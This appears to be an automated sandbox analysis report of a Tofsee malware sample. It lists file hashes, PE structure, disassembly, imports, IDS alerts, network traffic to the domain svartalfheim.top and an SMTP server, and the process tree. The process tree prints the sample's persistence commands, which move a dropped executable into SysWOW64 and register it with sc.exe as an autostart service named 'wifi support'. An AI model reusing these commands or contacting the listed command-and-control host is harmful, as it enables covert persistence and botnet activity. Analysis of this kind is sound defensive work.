Process:C:\Windows\SysWOW64\cmd.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):13894656
Entropy (8bit):6.269320784920095
Encrypted:false
SSDEEP:24576:R9X0YMmCUMy4444444444444444444444444444444444444444444444444444U:NCU
MD5:CD1553A922DBF34673BA9D9D9A0FF5DE
SHA1:E6D68A115FC8CDA2A6C10BAD3939D2A6467465C1
SHA-256:98D4810DA53B52396776B987C7C3EBB467C4C446DA27038E3B187E951982CDA3
SHA-512:34364B41B3EAC573683EE118F1493E27E59A71FEE242B12A53F1379AC7B9EA158AF05087DF30FEC37F9C6C0BB02B036D32BD0F58FE3EFF1EE11751E091CC7F05
Malicious:true

Process:C:\Windows\SysWOW64\netsh.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):3773
Entropy (8bit):4.7109073551842435
Encrypted:false
SSDEEP:48:VHILZNfrI7WFY32iIiNOmV/HToZV9It199hiALlIg39bWA1RvTBi/g2eB:VoLr0y9iIiNOoHTou7bhBlIydWALLt2w
MD5:DA3247A302D70819F10BCEEBAF400503
SHA1:2857AA198EE76C86FC929CC3388A56D5FD051844
SHA-256:5262E1EE394F329CD1F87EA31BA4A396C4A76EDC3A87612A179F81F21606ABC8
SHA-512:48FFEC059B4E88F21C2AA4049B7D9E303C0C93D1AD771E405827149EDDF986A72EF49C0F6D8B70F5839DCDBD6B1EA8125C8B300134B7F71C47702B577AD090F8
Malicious:false
Preview:
A specified value is not valid.

Usage: add rule name=<string>
 dir=in|out
 action=allow|block|bypass
 [program=<program path>]
 [service=<service short name>|any]
 [description=<string>]
 [enable=yes|no (default=yes)]
 [profile=public|private|domain|any[,...]]
 [localip=any|<IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>]
 [remoteip=any|localsubnet|dns|dhcp|wins|defaultgateway|
 <IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>]
 [localport=0-65535|<port range>[,...]|RPC|RPC-EPMap|IPHTTPS|any (default=any)]
 [remoteport=0-65535|<port range>[,...]|any (default=any)]
 [protocol=0-255|icmpv4|icmpv6|icmpv4:type,code|icmpv6:type,code|
 tcp|udp|any (default=any)]
 [interfacetype=wireless|lan|ras|any]
 [rmtcomputergrp=<SDDL string>]
 [rmtusrgrp=<SDDL string>]
 [edge=yes|deferapp|deferuser|no (default=no)]
 [security=authenticate|authenc|authdynenc|authnoencap|

File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):6.804284680028488
TrID:
• Win32 Executable (generic) a (10002005/4) 99.83%
• Windows Screen Saver (13104/52) 0.13%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:OcmKX57vR7.exe
File size:293376
MD5:db4d9ca855430682836db0a535e75594
SHA1:7a9a84d79268c30b93c48f981190182197712493
SHA256:a96edd53cb70eb51f8bb9fbd0b9d0777e6b65c5203fb3b73229431b49da155e4
SHA512:329977d9720746a390d42f0f30683a8cf1091206b35d23714087c89a8dc871b5f6ad9ed7ce7989fd0fb17103692dfa0dd9d180f740aee9bcc288bb8df8237c8a
SSDEEP:6144:X6/jAHYI3JJGBq+AQX7xu0VMjqzt3zSQbcE/KTYuJfzlQ:XKjbQG4fQX1u0VMjqJGsCUMy
TLSH:EA549D10BB90D039F5BB16F85A7A926CB93E7AA0573450CF53D526EE5A346E0EC3130B
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Q......]...]...]..G]...]..Q]...]2..]...]...]...]..V])..]..F]...]..C]...]Rich...]........PE..L...U..a......................d....
Icon Hash:aecaae9ecea62aa2
Entrypoint:0x40b800
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:TERMINAL_SERVER_AWARE
Time Stamp:0x61AD8955 [Mon Dec 6 03:53:57 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:0
File Version Major:5
File Version Minor:0
Subsystem Version Major:5
Subsystem Version Minor:0
Import Hash:65ad0564921c8780ff1d72c1fb80ab35

Instruction
mov edi, edi
push ebp
mov ebp, esp
call 00007F622C9ACB3Bh
call 00007F622C9A2656h
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov edi, edi
push ebp
mov ebp, esp
push FFFFFFFEh
push 0042FF68h
push 0040EE70h
mov eax, dword ptr fs:[00000000h]
push eax
add esp, FFFFFF94h
push ebx
push esi
push edi
mov eax, dword ptr [00442394h]
xor dword ptr [ebp-08h], eax
xor eax, ebp
push eax
lea eax, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], eax
mov dword ptr [ebp-18h], esp
mov dword ptr [ebp-70h], 00000000h
mov dword ptr [ebp-04h], 00000000h
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [0040120Ch]
mov dword ptr [ebp-04h], FFFFFFFEh
jmp 00007F622C9A2668h
mov eax, 00000001h
ret
                                                                                                                                mov esp, dword ptr [ebp-18h]
                                                                                                                                mov dword ptr [ebp-78h], 000000FFh
                                                                                                                                mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                mov eax, dword ptr [ebp-78h]
                                                                                                                                jmp 00007F622C9A2798h
                                                                                                                                mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                call 00007F622C9A27D4h
                                                                                                                                mov dword ptr [ebp-6Ch], eax
                                                                                                                                push 00000001h
                                                                                                                                call 00007F622C9AE4AAh
                                                                                                                                add esp, 04h
                                                                                                                                test eax, eax
                                                                                                                                jne 00007F622C9A264Ch
                                                                                                                                push 0000001Ch
                                                                                                                                call 00007F622C9A278Ch
                                                                                                                                add esp, 04h
                                                                                                                                call 00007F622C9ADDA4h
                                                                                                                                test eax, eax
                                                                                                                                jne 00007F622C9A264Ch
                                                                                                                                push 00000010h
                                                                                                                                Programming Language:
                                                                                                                                • [ASM] VS2008 build 21022
                                                                                                                                • [ C ] VS2008 build 21022
                                                                                                                                • [IMP] VS2005 build 50727
                                                                                                                                • [C++] VS2008 build 21022
                                                                                                                                • [RES] VS2008 build 21022
                                                                                                                                • [LNK] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x306ac | 0x28 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x674000 | 0x4588 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1330 | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x9a80 | 0x40 | .text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x2e4 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x30818 | 0x30a00 | False | 0.4311887451799486 | COM executable for DOS | 6.320508702079994 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x32000 | 0x63d610 | 0x11a00 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.xovuhih | 0x670000 | 0x5 | 0x200 | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.nos | 0x671000 | 0x400 | 0x400 | False | 0.0166015625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.xij | 0x672000 | 0x400 | 0x400 | False | 0.0166015625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.devo | 0x673000 | 0x32 | 0x200 | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x674000 | 0x4588 | 0x4600 | False | 0.7131696428571429 | data | 6.230571562371972 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
AFX_DIALOG_LAYOUT | 0x677a08 | 0x2 | data | Korean | North Korea
AFX_DIALOG_LAYOUT | 0x677a08 | 0x2 | data | Korean | South Korea
RT_ICON | 0x6742b0 | 0x25a8 | data | Korean | North Korea
RT_ICON | 0x6742b0 | 0x25a8 | data | Korean | South Korea
RT_ICON | 0x676858 | 0x10a8 | data | Korean | North Korea
RT_ICON | 0x676858 | 0x10a8 | data | Korean | South Korea
RT_STRING | 0x677b50 | 0x48c | data | Korean | North Korea
RT_STRING | 0x677b50 | 0x48c | data | Korean | South Korea
RT_STRING | 0x677fe0 | 0x498 | data | Korean | North Korea
RT_STRING | 0x677fe0 | 0x498 | data | Korean | South Korea
RT_STRING | 0x678478 | 0x10a | data | Korean | North Korea
RT_STRING | 0x678478 | 0x10a | data | Korean | South Korea
RT_ACCELERATOR | 0x6779a0 | 0x68 | data | Korean | North Korea
RT_ACCELERATOR | 0x6779a0 | 0x68 | data | Korean | South Korea
RT_ACCELERATOR | 0x677928 | 0x78 | data | Korean | North Korea
RT_ACCELERATOR | 0x677928 | 0x78 | data | Korean | South Korea
RT_GROUP_ICON | 0x677900 | 0x22 | data | Korean | North Korea
RT_GROUP_ICON | 0x677900 | 0x22 | data | Korean | South Korea
RT_VERSION | 0x677a10 | 0x140 | MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79 | Korean | North Korea
RT_VERSION | 0x677a10 | 0x140 | MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79 | Korean | South Korea
DLL | Import
KERNEL32.dll | OpenProcess, GetNamedPipeHandleStateA, GetQueuedCompletionStatus, FillConsoleOutputCharacterA, EnumSystemCodePagesW, TerminateProcess, GetVolumeNameForVolumeMountPointA, GetVersionExA, VerifyVersionInfoA, WriteConsoleInputA, EnumDateFormatsA, FindNextFileA, CopyFileExW, BuildCommDCBAndTimeoutsA, VirtualLock, WriteProfileStringA, VerifyVersionInfoW, GetDriveTypeW, GetFileInformationByHandle, DeleteFileA, FindNextVolumeMountPointW, TlsGetValue, ResetWriteWatch, GetConsoleTitleW, GetComputerNameExW, GetTimeZoneInformation, GetModuleHandleA, GetSystemDirectoryA, GetDriveTypeA, LoadLibraryA, GetShortPathNameW, ReleaseActCtx, GetProfileSectionW, DeleteFileW, GetCommandLineA, InterlockedIncrement, InterlockedExchangeAdd, CreateActCtxW, FindResourceA, FormatMessageA, GetModuleFileNameA, CreateJobObjectW, InitializeCriticalSection, GetNumberOfConsoleMouseButtons, FindNextVolumeA, CreateNamedPipeW, WritePrivateProfileStringA, GetConsoleAliasesLengthW, WriteProfileSectionW, AddAtomA, InterlockedDecrement, GetVersionExW, HeapFree, _hread, InterlockedCompareExchange, GetStartupInfoW, ConnectNamedPipe, GetCPInfoExA, GetSystemWow64DirectoryW, GetLastError, GetPrivateProfileIntW, GetConsoleAliasExesW, DebugBreak, EndUpdateResourceA, GetTickCount, VirtualQueryEx, DeleteVolumeMountPointA, OpenFileMappingA, GetModuleHandleW, SetDefaultCommConfigA, VirtualAlloc, GetSystemWindowsDirectoryA, GetACP, GetDiskFreeSpaceExA, EnumResourceTypesA, IsProcessInJob, WriteConsoleW, GetProcAddress, lstrcpyA, LoadLibraryW, ReadConsoleOutputW, SetHandleInformation, WritePrivateProfileSectionA, DeleteCriticalSection, GetFileAttributesA, DeactivateActCtx, CopyFileW, GlobalMemoryStatus, SetTapeParameters, GetDevicePowerState, ResetEvent, LockFile, MoveFileA, DisableThreadLibraryCalls, GetOverlappedResult, SetCommTimeouts, GlobalAlloc, SetThreadPriorityBoost, SetFileShortNameW, GetFileAttributesW, SetCalendarInfoA, ConvertFiberToThread, GetConsoleTitleA, SetComputerNameW, GetConsoleAliasesA, SetConsoleOutputCP, MoveFileWithProgressW, GetStdHandle, GetLocalTime, FoldStringW, EnumSystemLocalesW, ActivateActCtx, OpenSemaphoreA, GetModuleHandleExA, GetFileSize, SetUnhandledExceptionFilter, GetConsoleAliasesLengthA, SetProcessShutdownParameters, lstrcpynW, GlobalUnWire, FillConsoleOutputCharacterW, GetCompressedFileSizeA, ReadConsoleA, FreeUserPhysicalPages, WriteConsoleOutputCharacterW, TerminateJobObject, CreateFileA, SetTimerQueueTimer, SetLastError, UnhandledExceptionFilter, RaiseException, GetStartupInfoA, HeapValidate, IsBadReadPtr, EnterCriticalSection, LeaveCriticalSection, GetModuleFileNameW, GetCurrentProcess, IsDebuggerPresent, CloseHandle, SetStdHandle, GetFileType, WriteFile, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, Sleep, ExitProcess, QueryPerformanceCounter, GetCurrentThreadId, GetCurrentProcessId, GetSystemTimeAsFileTime, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, TlsAlloc, TlsSetValue, TlsFree, HeapDestroy, HeapCreate, VirtualFree, HeapAlloc, HeapSize, HeapReAlloc, GetOEMCP, GetCPInfo, IsValidCodePage, RtlUnwind, InitializeCriticalSectionAndSpinCount, OutputDebugStringA, OutputDebugStringW, FlushFileBuffers, WriteConsoleA, GetConsoleOutputCP, MultiByteToWideChar, SetFilePointer, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, ReadFile
Language of compilation system | Country where language is spoken
Korean | North Korea
Korean | South Korea
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
07/07/22-01:02:53.847400 | UDP | 2023883 | ET DNS Query to a *.top domain - Likely Hostile | 54960 | 53 | 192.168.2.3 | 8.8.8.8
07/07/22-01:02:13.617293 | UDP | 2023883 | ET DNS Query to a *.top domain - Likely Hostile | 63332 | 53 | 192.168.2.3 | 8.8.8.8
07/07/22-01:01:33.050484 | UDP | 2023883 | ET DNS Query to a *.top domain - Likely Hostile | 57723 | 53 | 192.168.2.3 | 8.8.8.8
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 7, 2022 01:01:30.481129885 CEST | 49744 | 25 | 192.168.2.3 | 40.93.207.0
Jul 7, 2022 01:01:30.587388992 CEST | 25 | 49744 | 40.93.207.0 | 192.168.2.3
Jul 7, 2022 01:01:30.587618113 CEST | 49744 | 25 | 192.168.2.3 | 40.93.207.0
Jul 7, 2022 01:01:30.588087082 CEST | 49744 | 25 | 192.168.2.3 | 40.93.207.0
Jul 7, 2022 01:01:30.694906950 CEST | 25 | 49744 | 40.93.207.0 | 192.168.2.3
Jul 7, 2022 01:01:30.696717024 CEST | 25 | 49744 | 40.93.207.0 | 192.168.2.3
Jul 7, 2022 01:01:30.696882010 CEST | 49744 | 25 | 192.168.2.3 | 40.93.207.0
Jul 7, 2022 01:01:30.700531006 CEST | 25 | 49744 | 40.93.207.0 | 192.168.2.3
Jul 7, 2022 01:01:30.700675011 CEST | 49744 | 25 | 192.168.2.3 | 40.93.207.0
Jul 7, 2022 01:01:33.441209078 CEST | 49745 | 443 | 192.168.2.3 | 46.173.215.82
Jul 7, 2022 01:01:33.441263914 CEST | 443 | 49745 | 46.173.215.82 | 192.168.2.3
Jul 7, 2022 01:01:33.441358089 CEST | 49745 | 443 | 192.168.2.3 | 46.173.215.82
Jul 7, 2022 01:02:13.457570076 CEST | 49745 | 443 | 192.168.2.3 | 46.173.215.82
Jul 7, 2022 01:02:13.457674980 CEST | 443 | 49745 | 46.173.215.82 | 192.168.2.3
Jul 7, 2022 01:02:13.457745075 CEST | 49745 | 443 | 192.168.2.3 | 46.173.215.82
Jul 7, 2022 01:02:13.682745934 CEST | 49762 | 443 | 192.168.2.3 | 46.173.215.82
Jul 7, 2022 01:02:13.682801962 CEST | 443 | 49762 | 46.173.215.82 | 192.168.2.3
Jul 7, 2022 01:02:13.682898998 CEST | 49762 | 443 | 192.168.2.3 | 46.173.215.82
Jul 7, 2022 01:02:53.693027020 CEST | 49762 | 443 | 192.168.2.3 | 46.173.215.82
Jul 7, 2022 01:02:53.693145037 CEST | 443 | 49762 | 46.173.215.82 | 192.168.2.3
Jul 7, 2022 01:02:53.693253994 CEST | 49762 | 443 | 192.168.2.3 | 46.173.215.82
Jul 7, 2022 01:02:54.217214108 CEST | 49843 | 443 | 192.168.2.3 | 46.173.215.82
Jul 7, 2022 01:02:54.217258930 CEST | 443 | 49843 | 46.173.215.82 | 192.168.2.3
Jul 7, 2022 01:02:54.217355013 CEST | 49843 | 443 | 192.168.2.3 | 46.173.215.82
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 7, 2022 01:01:30.330734015 CEST | 55923 | 53 | 192.168.2.3 | 8.8.8.8
Jul 7, 2022 01:01:30.477118969 CEST | 53 | 55923 | 8.8.8.8 | 192.168.2.3
Jul 7, 2022 01:01:33.050483942 CEST | 57723 | 53 | 192.168.2.3 | 8.8.8.8
Jul 7, 2022 01:01:33.439902067 CEST | 53 | 57723 | 8.8.8.8 | 192.168.2.3
Jul 7, 2022 01:02:13.617292881 CEST | 63332 | 53 | 192.168.2.3 | 8.8.8.8
Jul 7, 2022 01:02:13.637813091 CEST | 53 | 63332 | 8.8.8.8 | 192.168.2.3
Jul 7, 2022 01:02:53.847399950 CEST | 54960 | 53 | 192.168.2.3 | 8.8.8.8
Jul 7, 2022 01:02:54.216084003 CEST | 53 | 54960 | 8.8.8.8 | 192.168.2.3
Jul 7, 2022 01:03:23.491235971 CEST | 50608 | 53 | 192.168.2.3 | 8.8.8.8
Jul 7, 2022 01:03:23.522816896 CEST | 53 | 50608 | 8.8.8.8 | 192.168.2.3
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jul 7, 2022 01:01:30.330734015 CEST | 192.168.2.3 | 8.8.8.8 | 0x6f50 | Standard query (0) | microsoft-com.mail.protection.outlook.com | A (IP address) | IN (0x0001)
Jul 7, 2022 01:01:33.050483942 CEST | 192.168.2.3 | 8.8.8.8 | 0xcda | Standard query (0) | svartalfheim.top | A (IP address) | IN (0x0001)
Jul 7, 2022 01:02:13.617292881 CEST | 192.168.2.3 | 8.8.8.8 | 0xf416 | Standard query (0) | svartalfheim.top | A (IP address) | IN (0x0001)
Jul 7, 2022 01:02:53.847399950 CEST | 192.168.2.3 | 8.8.8.8 | 0xf180 | Standard query (0) | svartalfheim.top | A (IP address) | IN (0x0001)
Jul 7, 2022 01:03:23.491235971 CEST | 192.168.2.3 | 8.8.8.8 | 0xfda6 | Standard query (0) | microsoft-com.mail.protection.outlook.com | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jul 7, 2022 01:01:30.477118969 CEST | 8.8.8.8 | 192.168.2.3 | 0x6f50 | No error (0) | microsoft-com.mail.protection.outlook.com | | 40.93.207.0 | A (IP address) | IN (0x0001)
Jul 7, 2022 01:01:30.477118969 CEST | 8.8.8.8 | 192.168.2.3 | 0x6f50 | No error (0) | microsoft-com.mail.protection.outlook.com | | 40.93.207.1 | A (IP address) | IN (0x0001)
Jul 7, 2022 01:01:30.477118969 CEST | 8.8.8.8 | 192.168.2.3 | 0x6f50 | No error (0) | microsoft-com.mail.protection.outlook.com | | 104.47.53.36 | A (IP address) | IN (0x0001)
Jul 7, 2022 01:01:30.477118969 CEST | 8.8.8.8 | 192.168.2.3 | 0x6f50 | No error (0) | microsoft-com.mail.protection.outlook.com | | 104.47.54.36 | A (IP address) | IN (0x0001)
Jul 7, 2022 01:01:30.477118969 CEST | 8.8.8.8 | 192.168.2.3 | 0x6f50 | No error (0) | microsoft-com.mail.protection.outlook.com | | 52.101.24.0 | A (IP address) | IN (0x0001)
Jul 7, 2022 01:01:33.439902067 CEST | 8.8.8.8 | 192.168.2.3 | 0xcda | No error (0) | svartalfheim.top | | 46.173.215.82 | A (IP address) | IN (0x0001)
Jul 7, 2022 01:02:13.637813091 CEST | 8.8.8.8 | 192.168.2.3 | 0xf416 | No error (0) | svartalfheim.top | | 46.173.215.82 | A (IP address) | IN (0x0001)
Jul 7, 2022 01:02:54.216084003 CEST | 8.8.8.8 | 192.168.2.3 | 0xf180 | No error (0) | svartalfheim.top | | 46.173.215.82 | A (IP address) | IN (0x0001)
Jul 7, 2022 01:03:23.522816896 CEST | 8.8.8.8 | 192.168.2.3 | 0xfda6 | No error (0) | microsoft-com.mail.protection.outlook.com | | 104.47.53.36 | A (IP address) | IN (0x0001)
Jul 7, 2022 01:03:23.522816896 CEST | 8.8.8.8 | 192.168.2.3 | 0xfda6 | No error (0) | microsoft-com.mail.protection.outlook.com | | 104.47.54.36 | A (IP address) | IN (0x0001)
Jul 7, 2022 01:03:23.522816896 CEST | 8.8.8.8 | 192.168.2.3 | 0xfda6 | No error (0) | microsoft-com.mail.protection.outlook.com | | 52.101.24.0 | A (IP address) | IN (0x0001)
Jul 7, 2022 01:03:23.522816896 CEST | 8.8.8.8 | 192.168.2.3 | 0xfda6 | No error (0) | microsoft-com.mail.protection.outlook.com | | 40.93.207.0 | A (IP address) | IN (0x0001)
Jul 7, 2022 01:03:23.522816896 CEST | 8.8.8.8 | 192.168.2.3 | 0xfda6 | No error (0) | microsoft-com.mail.protection.outlook.com | | 40.93.207.1 | A (IP address) | IN (0x0001)
                                                                                                                                TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                                Jul 7, 2022 01:01:30.696717024 CEST254974440.93.207.0192.168.2.3220 CB1PEPF00002061.mail.protection.outlook.com Microsoft ESMTP MAIL Service ready at Wed, 6 Jul 2022 23:01:30 +0000

Target ID:0
Start time:01:01:18
Start date:07/07/2022
Path:C:\Users\user\Desktop\OcmKX57vR7.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\OcmKX57vR7.exe"
Imagebase:0x400000
File size:293376 bytes
MD5 hash:DB4D9CA855430682836DB0A535E75594
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000000.00000003.265491962.0000000000AF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_Tofsee, Description: Detects Tofsee, Source: 00000000.00000003.265491962.0000000000AF0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: MALWARE_Win_Tofsee, Description: Detects Tofsee, Source: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: ditekSHen
Reputation:low

Target ID:1
Start time:01:01:22
Start date:07/07/2022
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ghrubsm\
Imagebase:0xc20000
File size:232960 bytes
MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Target ID:2
Start time:01:01:23
Start date:07/07/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7c9170000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Target ID:3
Start time:01:01:23
Start date:07/07/2022
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\pjzcupje.exe" C:\Windows\SysWOW64\ghrubsm\
Imagebase:0xc20000
File size:232960 bytes
MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Target ID:4
Start time:01:01:23
Start date:07/07/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7c9170000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Target ID:5
Start time:01:01:24
Start date:07/07/2022
Path:C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):true
Commandline:C:\Windows\System32\sc.exe" create ghrubsm binPath= "C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe /d\"C:\Users\user\Desktop\OcmKX57vR7.exe\"" type= own start= auto DisplayName= "wifi support
Imagebase:0xcd0000
File size:60928 bytes
MD5 hash:24A3E2603E63BCB9695A2935D3B24695
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Target ID:7
Start time:01:01:24
Start date:07/07/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7c9170000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Target ID:8
Start time:01:01:25
Start date:07/07/2022
Path:C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):true
Commandline:C:\Windows\System32\sc.exe" description ghrubsm "wifi internet conection
Imagebase:0xcd0000
File size:60928 bytes
MD5 hash:24A3E2603E63BCB9695A2935D3B24695
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Target ID:10
Start time:01:01:25
Start date:07/07/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7c9170000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Target ID:11
Start time:01:01:26
Start date:07/07/2022
Path:C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\System32\sc.exe" start ghrubsm
Imagebase:0xcd0000
File size:60928 bytes
MD5 hash:24A3E2603E63BCB9695A2935D3B24695
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Target ID:12
Start time:01:01:26
Start date:07/07/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7c9170000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Target ID:13
Start time:01:01:27
Start date:07/07/2022
Path:C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe /d"C:\Users\user\Desktop\OcmKX57vR7.exe"
Imagebase:0x400000
File size:13894656 bytes
MD5 hash:CD1553A922DBF34673BA9D9D9A0FF5DE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000000D.00000002.284998485.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Author: Joe Security
• Rule: MALWARE_Win_Tofsee, Description: Detects Tofsee, Source: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Author: ditekSHen
• Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000000D.00000002.285025584.0000000000B50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_Tofsee, Description: Detects Tofsee, Source: 0000000D.00000002.285025584.0000000000B50000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000000D.00000003.283655690.0000000000B50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
